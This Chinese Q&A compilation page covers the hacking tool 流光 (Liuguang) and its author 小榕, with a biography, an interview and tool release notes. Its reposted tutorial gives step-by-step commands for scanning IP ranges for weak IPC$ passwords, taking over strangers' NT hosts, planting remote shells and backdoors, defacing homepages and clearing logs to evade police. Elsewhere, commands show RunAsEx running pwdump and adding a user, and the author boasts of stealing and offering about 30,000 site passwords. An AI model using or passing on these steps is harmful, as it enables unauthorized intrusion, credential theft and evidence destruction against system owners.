本文目录一览:
- 1、流光的作者小榕的真名叫什么,是什么大学毕业的?有认识他或者和他大学校友的么?
- 2、为什么装流光的时候卡巴斯基总说有毒呢?
- 3、请问流光软件是什么软件?有什么作用和怎样使用的?
- 4、流光软件是干什么的?
- 5、小榕(流光) 真实姓名和工作地点...
- 6、黑客工具--流光?
流光的作者小榕的真名叫什么,是什么大学毕业的?有认识他或者和他大学校友的么?
小榕 小榕
网名:小榕
性别:男
年纪:37
婚姻:已婚
资力:中国CAD/CAM协会会员,高级程序员
格言:无论在现实或是网络中,我都是孤独的……
黑客原则:不能仇视社会,不能给别人制造麻烦,不能给别人带来损失。有人对黑客这样评价:黑客是一种不断研究不断探索的境界。
============================================================
无可否认,小榕永远是中国黑客/安全界的骄傲!
小榕,1972年出生,据小榕自己说,他从小就是一个调皮的家伙,看看他的自我介绍:
小学三年级因倒卖指南针(我一毛钱买进,一块钱卖出),被学校警告。
小学六年级给同班女同学写情书,未果。
初一曾经在夜里披着草席爬进公厕(男厕),把一个正在出恭的老头吓得失足……
初二第一次约女同学看电影《斯巴达克斯》,中途被告知“恐怖”,女同学提前退场,我一个人坚持看完了电影。
初二加入了中国篆刻家协会。
初三因为拆自行车零件(别人的)被派出所护送回家。
高一和小混混一块寻衅滋事被街道派出所传唤一次,也是在那个时候学会了吸烟。
进入了一所树没草高、男比女多的工科大学。
大一上学期高等数学上册补考一次。
大一下学期高等数学上册再补考一次。
大一下学期普通物理补考一次。
毕业前普通物理再补考一次。
加入了中国CAD/CAM协会。
最后以“排名30名,本班共31人”(《毕业推荐书》上的原话)的成绩毕业。
1996年第一次上网。
1997年春节第一次破解了别人的账号
1997年夏天和别人打架,脸上留下了永远的痕迹
1998年通过了高级程序员水平考试
1999年开始写扫描/破解类软件
至今还在哭泣……
===========================================================
呵呵,不管怎么说,小榕无庸质疑是国内目前的顶级黑客,他开发的流光软件是众多小“黑客”必用的软件之一。
父亲(已去世)是大学教授的小榕,对黑客的道德观认识得很清楚:黑客像美国西部开发时的牛仔,没有法律的约束,但却有自己的做事准则。黑客要有道德底线,小榕的三条做黑客原则:不能仇视社会,不能给别人制造麻烦,不能给别人带来损失。有人对黑客这样评价:黑客是一种不断研究不断探索的境界。
小榕的工具是因为一个扫描工具。"流光"许多接触过黑客工具的无一不知道小榕的。
小榕说,“通往电脑的道路不只一条,就看你怎么走”。 “只要我敲键盘的速度足够快,可以一天黑掉100个网站”小榕曾经在一个月里进入1000家网站,并找出其中的漏洞。小榕的名字在网上非常响亮,这倒不是因为他黑过谁,而是因为他发布了许多杀伤力巨大而又及易上手Hack工具。小榕轻易不出刀,他只负责提供刀具。
呵呵,但不管怎么说,小榕无庸质疑的是国内目前的顶级黑客,他开发的流光软件是众多小“黑客”必用的软件之一。
为什么装流光的时候卡巴斯基总说有毒呢?
流光是我国著名黑客程序作者"小榕"的作品,因为是黑客工具所以带有一些特殊的代码来完成特殊的命令比如扫描他人计算机,而这是杀毒软件所不允许的,所以黑客软件不管对你的机子是否有害,没有经过处理的,黑软 都回被当病毒看待
---(通俗解释)
请问流光软件是什么软件?有什么作用和怎样使用的?
流光基础教程
作者:未知 来源:从互联网收集整理并转载
很长时间也没有写什么东西了,这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 :(你既然看到这儿了,就在听我牢骚几句吧:)搞安全应该有正确的心态,别以为你会了个工具使用就可以一步登天。交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。
今天要写的是流光的IPC探测:
一、目的和任务:
1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。
2、学习IPC探测的相关知识。
二、探测流程:
1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!
什么是IPC:
IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。
IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。
注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。
可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …
2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。
在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。
3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机
4、探测中……
(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)
有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。
黑了他 !
开个dos prompt 执行如下命令,本次用的例子如下图。
1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接
2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。
3、 net time \\对方IP || 看看对方的本地时间
4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。
5、 telnet 对方ip 端口 ||
6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||
7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .
假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot
下面的图有演示
8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:
执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)
9、还能做成其他的么 ?
当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)
10、日志清除,断开连接 :
执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete
这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。
在网吧写完 :( 错误之处请赐教。
只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)
流光软件是干什么的?
流光是黑客软件用来扫描端口以及系统漏洞和各方面的信息。来进行攻击。全名叫流光扫描器。
小榕(流光) 真实姓名和工作地点...
黑客故事——采访小榕
他,流光、溯雪、乱刀等黑客/安全作品的开发者,他的名字可以说载入了中国黑客/安全发展史中辉煌的一页。他的软件相当普及,一次,通过非正常手段进入一台机器,赫然发现机器主人的桌面上摆着“流光”……。对很多黑客爱好者来说,流光就象Winamp、Winzip等常用工具一样,已经成为电脑不可或缺的一部分。
在他的“小榕软件实验室” ,在“关于小榕”的栏目里,他这样写到:无论在现实或是网络中,我都是孤独的……
Zero:小榕,你好,关于你的介绍我们很多读者在网上已经读过许多,更多的读者是通过你的作品知道你的,但是关于你的东西都是比较琐碎的,所以,我们还是先请你介绍一下自己吧?
小榕:我是一个程序员,人很普通。
Zero:你是什么时候涉入黑客或是安全这个领域的呢?或者说是什么东西触发了你对这个领域的兴趣?
小榕:我初次进入这个领域是1996年,从我开始使用Cernet(中国教育科研网)开始。因为当时上网的费用非常高,例如发E-mail每K要收一毛钱,所以就开始尝试去Crack别人的帐号。
因为我的专业是软件,所以我具有较好的程序设计能力,这对于我后来开发一系列的软件是起了很大作用的。
Zero:最初是怎么想到开发流光这个产品的?
小榕:最初开发流光这个东西,并没有想到会做成今天这个样子,最初的版本仅仅具有POP3/FTP的暴力破解功能,随着网络的发展,不断地加入新功能,才成为了现在这个样子。本来打算到流光2.5的时候就不再继续下去了,后来是由于用的人很多,所以才会促使我继续写下去。
Zero:“小榕软件实验室”是你一个人负责还是由几个人组成的团队?
小榕:我一个人。
Zero:当初开发流光的时候,想到过自己的作品影响面这么广吗?你的作品现在这么普及,你是怎么想的,有没有担心过自己的作品带来负面影响?
小榕:我没有想到影响会这么广,至于说到负面的影响,我想这个问题取决于怎么来看了。同样的工具在网络中也有,只不过没有像流光这样高度集成的而已。
Zero:你一般如何测试你软件的入侵部分呢?
小榕:首先是在内网测试,然后散发一些测试的版本给我熟悉的朋友帮我测试,这样我可以从不同的角度来发现问题。一个人的思维如果已经成为了模式,那么要改变是很困难的,有一些软件的缺陷是需要靠大家的测试来发现的。
Zero:未来的目标是什么?对自己的未来一直都很明确吗,有没有过彷徨和迷茫?在有困难的时候您是怎么克服的?
小榕:不断努力,遇到困难的时候,总是会告诉自己,如果现在就放弃了,那么就太没有责任心了, 这样下去终究会一事无成的。
Zero:对使用你软件的朋友有什么忠告吗?
小榕:知道自己在做什么,对自己负责对别人负责。
Zero:你觉得你的性格叛逆吗?如果有,这样的性格给你带来了什么,又让你失去了什么?
小榕:前几年可能是,但是现在已经比较平和了,这样的性格给我带来的就是一种坚持不懈的精神和一点灵感。
如果说失去了什么,我失去了现实的世界。
Zero:目前你的日常安全工作主要是些什么?
小榕:开发软件,研究一些安全方面的技术,渗透测试。
Zero:你认为中国现在面临的安全问题是什么?中国安全现在面临的最大困难是什么?
小榕:对安全的意识,安全不仅仅在于主机或者操作系统,在更大程度上在于意识。有很多的管理人员对安全的意识淡漠,还有更多的人虽然也很注意安全问题,但是缺乏相关的知识和技术。安全不是一个单纯的技术问题,它和管理、教育、制度等有很大关系。
Zero:如何成为一名优秀的安全人员?
小榕:敏锐的嗅觉+不懈的努力。
Zero:作为一个想进入黑客/安全这个门的朋友来说,应该注意从哪些方面来锻炼自己,提升自己?
小榕:我觉得应该从一些基本的事情开始做起,例如关于对网络协议的深入了解等,而不是仅仅拘泥于对某个漏洞或者某个工具的使用。安全的技术发展很快,从技术上来说你不可能熟知所有的细节,但是熟知基础知识是了解这些细节的前提。
Zero:对去年来发生的中美黑客大战有什么看法?
小榕:每个人都需要喧泄,只不过是方法不同而已。
Zero:现在很多年轻人对“黑客”很崇拜,对“黑客”技术很喜爱,你有什么忠告吗?
小榕:黑客不是一种职业,而是一种精神。
答案补充
(续上)
Zero:我看到你的“关于小榕”栏目里说,“如果有人破坏了这个美好。你就将……Assault!”在生活中与人相处,你觉得自己偏执吗?假设会有这种情况,在工作中,对方是你的竞争对手,在生活,大家是朋友,你如何看待友情和工作的关系?
小榕:我不觉得我偏执,在大多数情况我非常易于相处。人是需要工作的,但是也不能没有友情。
Zero:人与人之间的交流很重要,你网上说“无论在网络还是现实中,我都很孤独”,你的孤独源于你的性格还是你的工作性质?为什么?
小榕:来源于性格,为什么?孤独是一种感觉。
Zero:你希望你的小孩未来涉入安全/黑客领域吗?
小榕:我还没有想过 :-)
黑客工具--流光?
【流光 2001 For NT/2000】
SQL Server扫描:速度是Sqldict的7倍。
测试一:255台主机的网段,SQL 40台,5分钟内成功得到18个SA。
测试二:255台主机的网段,SQL 38台,5分钟内成功得到12个SA。
【流影 Http Edition Beta 2】情况
流影Http Edtion Beta2的改进:
1、提高了探测速度,在我养的鸡上面,每分钟可以扫描2500次,也就是说一天可以扫描3,600,000次,大约是前版速度的5倍。
2、可以作为NT的一个Service登陆。就是可以直接用netsvc启动。
3、控制的方便性。进行修改、删除当前命令行,并且可以重复输入上一次的命令。此外登陆时密码也不再是明文显示了。
目前还需要在NT4中做一些测试,不久即可提供下载。
【流光2000 Preview 3 For NT/2000】升级
流光2000 Preview 3发布,需要先下载Preview 2 For NT/2000。修正BUG:
1、在Import时选择取消时出错的问题。
2、修正HTTP/Proxy时误报的问题。目前有一部分网站在多次探测失败时会禁止当前IP的登陆,对于目前这个问题没有太好的解决方法,唯一可以解决方法是采用一个Proxy列表自动切换。目前我没有太多的Proxy,如果您有请发给给我一份,以便我能调试。
其他:
今天突然想看看国内用户一般采用的密码是什么,于是随便挑了一个网站,经过一系列步骤登陆进去,将其用户注册数据库下载了。大约有87M(晕倒,还好是DDN上网用了大约10分钟就下载完了),有将近30000个用户和密码。于是做了一个简单的统计,使用密码最多的是0000、00000、000000、0000000、00000000、aaaa、1111.......等,其余密码85%都使用数字。我将密码整理了一遍,又需要的可以下载。
【光和影子】-流光/流影实例说明
光和影子
【流影 POP3 Edtion】发布
【流影 HTTP Edtion】发布
【流影 POP3 Edtion】使用说明
使用说明
【流影 POP3 Edtion】开发顺利
目前开发顺利,不久即可提供下载。
【流光2000】 Preview 2 (中/英文版) For Windows 98 发布
由于很多用户没有安装NT/2000,所以特别定制了一个能在98下面运行的版本,但是此版本没有IPC(Inter Process Communication)功能。
【流光2000】Preview 2 (中/英文版)For Windows NT/2000 发布
包括几个工具(在Tools目录中)以及一个关于利用2000作为跳板的说明。
【溯雪Beta7】For Windows 98/NT/2000发布
支持任意大字典,支持需要身份认证的Proxy,不再会出现假死机。
【论坛更换】
由于最近总有人在我的论坛上面捣乱,所以决定更换论坛。
【流光2000】Preview 2 中英文版将同时发布
【RunAsEx】For Windows NT 3.51/4.0/2000
用途:在Windows NT中以指定用户身份创建进程。
当我们用Srv.exe(NetCat)登录之后,发现有很多程序无法运行,例如:pwdump,尽管这个时候已经具有了Administrator的密码。
用AT命令创建的进程,Windows NT是以系统帐号的身份运行的,而不是创建者的帐号。系统帐号的权限是有限的,例如不能启动和网络相关的程序。
Windows 2000中提供了一个RunAs程序就是实现这个功能的,但是如果用Srv.exe登陆,由于无法更改回显模式而无法使用。除非使用Telnet登陆。NT4.0没有Telnet服务,所以即使将RunAs复制到NT4.0中,也会因为前面说的原因无法使用。所以特地写了一个小工具RunAsEx。
RunAsEx可以适用于NT4.0/2000,可以在Srv.exe登陆的连接中使用。
RunAsEx UserName Password Execute File ["Execute Option"]
UserName 运行创建程序的用户名称
Password 创建程序的用户密码,如果密码为空,以*号代替。
Execute File 可执行文件名,必须为全路径,带后缀。
["Execute Option"] 可执行文件的命令行选项,如果无需选项,此项可以不填。选项必须以"开始和结束。
例如:
RunAsEx Administrator password \winnt\pwdump.exe "pwd.txt"
RunAsEx Administrator password \winnt\system32\net.exe "user Hakcer /add"
注意:此工具不能在本地运行
可在【小榕作品】中下载。
【流光 2000】For Windows 2000/NT Preview 2 Update
修正Socket超时及线程同步问题,线程可以更加稳定运行。
【流光 2000】For Windows 2000/NT 4.0 Preview 1 Announced
可以在Windows 2000及Windows NT 4.0中运行,但是没有在NT4.0中做过测试。
不能运行于Windows 9.x。
可以运行于局域网,但是IPC$探测功能对国内IP保留。
建议不要强制退出,否则会导致内存泄漏(Memory Leak)。
【流光 2000】将会发布一个英文版。
【溯雪】Beta 7稍后发布。
一年前的今天,【流光1.0】问世,在随后一年的时间里又经历了1.1、1.12、1.13、1.25、1.27、2.0、2.5、2.5SE、3.0等版本,代码由7,000行发展到76,000行,目前用户数将近400,000。开发正因为有了这么多朋友的支持,我才得以坚持做下去。在此,小榕深表感谢!
请到【小榕作品】下载。
------------------
用许多的时间去后悔,不如再开始新的努力!
我是一只大大大鸵鸟,想要飞也飞也飞不高!